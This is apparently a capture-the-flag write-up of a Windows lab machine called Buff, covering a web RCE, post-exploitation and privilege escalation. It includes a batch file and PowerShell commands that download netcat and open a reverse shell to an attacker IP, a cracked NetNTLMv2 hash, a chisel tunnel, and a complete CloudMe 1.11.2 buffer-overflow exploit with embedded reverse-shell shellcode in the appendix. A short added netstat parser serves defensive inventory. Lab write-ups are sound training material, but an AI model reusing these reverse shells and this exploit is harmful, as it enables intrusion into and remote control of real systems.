Buff
Personal Rating: Hard
sudo nmap -sV <IP>
PORT STATE SERVICE VERSION
7680/tcp open pando-pub?
8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-title: mrb3n's Bro Hut
Running (JUST GUESSING): Microsoft Windows XP (85%)
Port 8080 shows this page:

This can be seen at ‘Contact’:
mrb3n's Bro Hut
Made using Gym Management Software 1.0
There are some obvious web pages, and the backend appears to be PHP based.
/index.php
/packages.php
/facilities.php
/about.php
/contact.php
/include/process_login.php
The pages are php, so if I don't find anything else, I might scan for php parameters.
For sign-in, a POST to /include/process_login.php is made; for the credentials test@aua.com : test the body is:
email=test%40aua.com&password=&p=ee26b0dd4af7e749aa1a8ee3c10ae9923f618980772e473f8819a5d4940e0db27ac185f8a0e1d5f84f88bc887fd67b143732c304cc5fa9ad8e6f57f50028a8ff
The password field itself is empty; the password seems to be sent in encoded form as the value of p.
A basic web directory brute-force revealed even more pages:
feroxbuster -u http://10.10.10.198:8080/ -x php
<SNIP>
[####################] - 80m 30000/30000 6/s http://10.10.10.198:8080/include/
[####################] - 79m 30000/30000 6/s http://10.10.10.198:8080/upload/
[####################] - 80m 30000/30000 6/s http://10.10.10.198:8080/boot/js/
[####################] - 80m 30000/30000 6/s http://10.10.10.198:8080/img/
[####################] - 80m 30000/30000 6/s http://10.10.10.198:8080/profile/
[####################] - 80m 30000/30000 6/s http://10.10.10.198:8080/profile/upload/
[####################] - 80m 30000/30000 6/s http://10.10.10.198:8080/Include/
[####################] - 81m 30000/30000 6/s http://10.10.10.198:8080/Profile/
[####################] - 81m 30000/30000 6/s http://10.10.10.198:8080/INCLUDE/
[####################] - 80m 30000/30000 6/s http://10.10.10.198:8080/Profile/upload/
[####################] - 81m 30000/30000 6/s http://10.10.10.198:8080/Img/
[####################] - 80m 30000/30000 6/s http://10.10.10.198:8080/profile/UPLOAD/
[####################] - 80m 30000/30000 6/s http://10.10.10.198:8080/att/
[####################] - 78m 30000/30000 6/s http://10.10.10.198:8080/boot/
[####################] - 76m 30000/30000 7/s http://10.10.10.198:8080/boot/CSS/
[####################] - 76m 30000/30000 7/s http://10.10.10.198:8080/boot/CSS/images/
[####################] - 75m 30000/30000 7/s http://10.10.10.198:8080/boot/CSS/Images/
[####################] - 75m 30000/30000 7/s http://10.10.10.198:8080/boot/JS/
[####################] - 60m 30000/30000 8/s http://10.10.10.198:8080/boot/JS/Plugins/
“Gym Management System 1.0” actually seems to exist, and this looks promising:
RCE
There was an unauthenticated RCE that I could find online on ExploitDB and with searchsploit. But these PoCs were Python2 and I found a Python3 version:

Persistence
evil.bat:
@echo off
c:\Users\shaun\nc64.exe 10.10.16.6 4444 -e cmd.exe
powershell -c (New-Object Net.WebClient).DownloadFile('http://10.10.16.6:8000/evil.bat','evil.bat')
powershell -c (New-Object Net.WebClient).DownloadFile('http://10.10.16.6:8000/nc64.exe','nc64.exe')
./evil.bat
Internal Enumeration
There is an unusual folder “UNP” in Program Files, but it does not seem interesting.
There is a file Tasks.bat in C:\Users\shaun\Documents with these contents:
START C:/xampp/xampp_start.exe
The user we got is not in any interesting groups:
PS C:\xampp> net user shaun
net user shaun
User name shaun
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 16/06/2020 14:08:08
Password expires Never
Password changeable 16/06/2020 14:08:08
Password required No
User may change password No
Workstations allowed All
Logon script
User profile
Home directory
Last logon 16/06/2020 21:38:46
Logon hours allowed All
Local Group Memberships *Users
Global Group memberships *None
The command completed successfully.
I got winPEASx64 on the host and ran it.
wget http://10.10.16.6:8000/winPEASx64.exe -OutFile winpeas.exe
.\winpeas.exe
I collected the systeminfo command output to search for vulnerabilities:
winPEAS found the NetNTLMv2 hash of shaun:
shaun::BUFF:1122334455667788:587100950429a8913c4f8f62b4c9746f:0101000000000000b08484e36c32da0115bbf5821aa198a9000000000800300030000000000000000000000000200000c7f15e66eeedef96c2d40813f1913191b66080688c23ac393ca073207bea0b430a00100000000000000000000000000000000000090000000000000000000000
Cracking it with hashcat, the password turned out to be empty.
hashcat -a 0 -m 5600 'shaun::BUFF:1122334455667788:587100950429a8913c4f8f62b4c9746f:0101000000000000b08484e36c32da0115bbf5821aa198a9000000000800300030000000000000000000000000200000c7f15e66eeedef96c2d40813f1913191b66080688c23ac393ca073207bea0b430a00100000000000000000000000000000000000090000000000000000000000' /usr/share/seclists/Passwords/rockyou.txt
It seems that unauthenticated users can create files and write data to C:\windows\tasks and C:\windows\system32\tasks.
shaun has full access to C:\Users\shaun\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup.
Also, path injection seems to be possible for many Session Manager DLLs.
There were no interesting existing scheduled tasks:
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
I tried to create a scheduled task, but that did not work due to lack of permissions:
schtasks /Create /RU "SYSTEM" /SC MINUTE /MO 1 /TN "SchedPE" /TR "cmd /c C:\Users\shaun\Documents\privesc.bat"
XAMPP 7.4.6 seems to be in use.
The server is listening on several ports, but only 8080 and 7460 are accessible from outside:
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 952
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:5040 0.0.0.0:0 LISTENING 6044
TCP 0.0.0.0:7680 0.0.0.0:0 LISTENING 7460
TCP 0.0.0.0:8080 0.0.0.0:0 LISTENING 2120
Port 7460 seems to be unassigned, so I am not sure what runs on it.
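In netstat -ano output the columns are Proto, Local Address, Foreign Address, State and PID, so the last number on each line above is the owning process id rather than a port. The following added parser (not part of this write-up) turns that output into a listener inventory and splits it into ports reachable from outside, ports bound to all interfaces but not reachable (host firewall), and loopback-only services; the 127.0.0.1:8888 line for CloudMe and its PID are constructed, since the write-up reports the port but does not show the line.

```python
"""Added example (not from the write-up): build a listener inventory from `netstat -ano`
and compare it with the ports an external scan reached.  netstat -ano columns are
Proto, Local Address, Foreign Address, State, PID: the last value is a process id."""
import re
from typing import Dict, List, Tuple

# The five LISTENING lines shown in the write-up, plus one CONSTRUCTED loopback line
# for the CloudMe service on 8888 (the write-up says it listens locally; PID assumed).
NETSTAT_ANO = """\
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 952
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:5040 0.0.0.0:0 LISTENING 6044
TCP 0.0.0.0:7680 0.0.0.0:0 LISTENING 7460
TCP 0.0.0.0:8080 0.0.0.0:0 LISTENING 2120
TCP 127.0.0.1:8888 0.0.0.0:0 LISTENING 5016
"""
# Ports the nmap scan at the top of the write-up reported open from outside.
EXTERNAL_OPEN = {7680, 8080}

# Local address may be IPv4 (0.0.0.0:135) or bracketed IPv6 ([::]:135).
LINE = re.compile(r"^\s*TCP\s+(\S+):(\d+)\s+\S+\s+LISTENING\s+(\d+)\s*$")

def parse_listeners(text: str) -> List[Tuple[str, int, int]]:
    """Return (bind_addr, port, pid) for every TCP LISTENING line."""
    out = []
    for line in text.splitlines():
        m = LINE.match(line)
        if m:
            out.append((m.group(1), int(m.group(2)), int(m.group(3))))
    return out

def pid_by_port(listeners) -> Dict[int, int]:
    """Map each listening port to the PID that owns it (e.g. 7680 -> 7460)."""
    return {port: pid for _addr, port, pid in listeners}

def classify(listeners, external_open) -> Dict[str, List[Tuple[int, int]]]:
    """Group (port, pid) pairs: reachable from outside, bound to all interfaces but
    filtered by the host firewall, or loopback-only (reachable only after a foothold)."""
    groups = {"exposed": [], "filtered": [], "loopback_only": []}
    for addr, port, pid in listeners:
        if addr.startswith("127.") or addr in ("[::1]", "::1"):
            groups["loopback_only"].append((port, pid))
        elif port in external_open:
            groups["exposed"].append((port, pid))
        else:
            groups["filtered"].append((port, pid))
    return groups
```

Loopback-only and firewall-filtered services are invisible to an external scan but still need patching, since they become reachable as soon as an attacker has a foothold on the host.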
I could not place a simple meterpreter shell on the host because it was blocked by Defender.
I found the interesting file C:\users\shaun\downloads\CloudMe_1112.exe
CloudMe BoF
searchsploit cloudme
CloudMe 1.11.2 - Buffer Overflow (PoC) | windows/remote/48389.py
Using netstat -ano I could determine that port 8888 is listening locally, which is the port of the CloudMe service. Since it is listening only locally, I established a SOCKS reverse proxy:
ATTACKER: ./chisel server -p 9050 --reverse
TARGET: .\chisel.exe client 10.10.16.6:9050 R:socks
I tried to use this exploit PoC using proxychains over the tunnel, but it says that the port could not be connected to.
I might create a reverse shell shellcode with msfvenom, put it in the exploitdb PoC and try that one with Python2 (pyenv).
I finally made it work with this (modified) exploit script (see appendix).
Prerequisites:
msfvenom -p windows/shell_reverse_tcp LPORT=6666 LHOST=10.10.16.6 EXITFUNC=thread -b "\x00\x0a\x0d" -f python
Put that in the Python exploit.
Exploitation:
Attackhost terminal 0:
./chisel server -p 9050 --reverse
Target terminal 0:
.\chisel.exe client 10.10.16.6:9050 R:socks
Attackhost terminal 1:
msf6 exploit(multi/handler) > run
Attackhost terminal 2:
proxychains python2.7 PoC_exploit_Win10_x64.py
An interesting takeaway for me was the EXITFUNC=thread feature. The default is ‘process’, but the user has no permissions to deal with processes, and I think that was the issue at first. When it worked I also used a reverse shell instead of a bind shell, but I think both could have worked. It was also good practice to generate custom shellcode for the existing PoC, for which I additionally had to fix some simple Python code errors.
Appendix: Python BoF Exploit
# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)
# Date: 2020-07-21
# Exploit Author: MTOTH
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Version: CloudMe 1.11.2
# Tested on: Windows 10 x64 (build 1909 and 1809)
# This version has been forked from the original PoC: https://www.exploit-db.com/exploits/46218
# Instructions:
# Start the CloudMe service and run the script.
import socket
import sys
import struct
target = "127.0.0.1"
padding1 = b"A" * 1052
EIP = struct.pack("<L", 0x68f7a81b) # 0x68f7a81b : jmp esp | {PAGE_EXECUTE_WRITECOPY} [Qt5Core.dll] ASLR: False, Rebase: False, SafeSEH: False
NOP = b"\x90" * 20
# The original PoC payload opened the Display Settings; it is replaced here with the
# reverse shell generated by:
# msfvenom -p windows/shell_reverse_tcp LPORT=6666 LHOST=10.10.16.6 EXITFUNC=thread -b "\x00\x0a\x0d" -f python
buf = b""
buf += b"\xda\xd9\xd9\x74\x24\xf4\x5a\xb8\x25\x84\x12\xad"
buf += b"\x2b\xc9\xb1\x52\x31\x42\x17\x03\x42\x17\x83\xcf"
buf += b"\x78\xf0\x58\xf3\x69\x77\xa2\x0b\x6a\x18\x2a\xee"
buf += b"\x5b\x18\x48\x7b\xcb\xa8\x1a\x29\xe0\x43\x4e\xd9"
buf += b"\x73\x21\x47\xee\x34\x8c\xb1\xc1\xc5\xbd\x82\x40"
buf += b"\x46\xbc\xd6\xa2\x77\x0f\x2b\xa3\xb0\x72\xc6\xf1"
buf += b"\x69\xf8\x75\xe5\x1e\xb4\x45\x8e\x6d\x58\xce\x73"
buf += b"\x25\x5b\xff\x22\x3d\x02\xdf\xc5\x92\x3e\x56\xdd"
buf += b"\xf7\x7b\x20\x56\xc3\xf0\xb3\xbe\x1d\xf8\x18\xff"
buf += b"\x91\x0b\x60\x38\x15\xf4\x17\x30\x65\x89\x2f\x87"
buf += b"\x17\x55\xa5\x13\xbf\x1e\x1d\xff\x41\xf2\xf8\x74"
buf += b"\x4d\xbf\x8f\xd2\x52\x3e\x43\x69\x6e\xcb\x62\xbd"
buf += b"\xe6\x8f\x40\x19\xa2\x54\xe8\x38\x0e\x3a\x15\x5a"
buf += b"\xf1\xe3\xb3\x11\x1c\xf7\xc9\x78\x49\x34\xe0\x82"
buf += b"\x89\x52\x73\xf1\xbb\xfd\x2f\x9d\xf7\x76\xf6\x5a"
buf += b"\xf7\xac\x4e\xf4\x06\x4f\xaf\xdd\xcc\x1b\xff\x75"
buf += b"\xe4\x23\x94\x85\x09\xf6\x3b\xd5\xa5\xa9\xfb\x85"
buf += b"\x05\x1a\x94\xcf\x89\x45\x84\xf0\x43\xee\x2f\x0b"
buf += b"\x04\x1b\xba\x03\xd2\x73\xb8\x23\xc0\x89\x35\xc5"
buf += b"\x9e\x9d\x13\x5e\x37\x07\x3e\x14\xa6\xc8\x94\x51"
buf += b"\xe8\x43\x1b\xa6\xa7\xa3\x56\xb4\x50\x44\x2d\xe6"
buf += b"\xf7\x5b\x9b\x8e\x94\xce\x40\x4e\xd2\xf2\xde\x19"
buf += b"\xb3\xc5\x16\xcf\x29\x7f\x81\xed\xb3\x19\xea\xb5"
buf += b"\x6f\xda\xf5\x34\xfd\x66\xd2\x26\x3b\x66\x5e\x12"
buf += b"\x93\x31\x08\xcc\x55\xe8\xfa\xa6\x0f\x47\x55\x2e"
buf += b"\xc9\xab\x66\x28\xd6\xe1\x10\xd4\x67\x5c\x65\xeb"
buf += b"\x48\x08\x61\x94\xb4\xa8\x8e\x4f\x7d\xc8\x6c\x45"
buf += b"\x88\x61\x29\x0c\x31\xec\xca\xfb\x76\x09\x49\x09"
buf += b"\x07\xee\x51\x78\x02\xaa\xd5\x91\x7e\xa3\xb3\x95"
buf += b"\x2d\xc4\x91"
padding2 = b"D" * (2000 - len(padding1 + EIP + b"\x90" * 20 + buf))
payload = padding1 + EIP + NOP + buf + padding2
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((target, 8888))
    s.send(payload)
    print(" [+] Payload with {} bytes sent!".format(len(payload)))
except Exception as e:
    # sys.exc_value is Python 2 only; report the caught exception directly instead
    print("Something bad happened. The error code was: {}".format(e))